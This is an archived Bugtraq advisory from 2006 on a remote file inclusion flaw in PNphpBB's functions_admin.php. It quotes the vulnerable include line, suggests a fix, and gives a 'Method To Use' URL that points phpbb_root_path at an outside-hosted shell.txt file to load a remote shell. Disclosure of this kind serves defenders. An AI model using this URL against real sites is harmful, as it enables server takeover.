Bugtraq: AzzCoder => PNphpBB (Latest) Remote File Include

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

AzzCoder => PNphpBB (Latest) Remote File Include

From: azzcoder () hotmail com
Date: 18 Sep 2006 03:28:06 -0000

Vendor: http://www.pnphpbb.com/

Vulnerable File: includes/functions_admin.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );

Method To Use:

http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?

How To Fix:

Add this code before the include

if ( !defined('IN_PHPBB') )
{
   die("Hacking attempt");
}

By Date By Thread

Current thread:

AzzCoder => PNphpBB (Latest) Remote File Include azzcoder (Sep 18)
- Re: AzzCoder => PNphpBB (Latest) Remote File Include Carsten Eilers (Sep 21)
  - Re: AzzCoder => PNphpBB (Latest) Remote File Include str0ke (Sep 21)
    - Re: AzzCoder => PNphpBB (Latest) Remote File Include Carsten Eilers (Sep 21)
- <Possible follow-ups>
- Re: AzzCoder => PNphpBB (Latest) Remote File Include Carsten Eilers (Sep 21)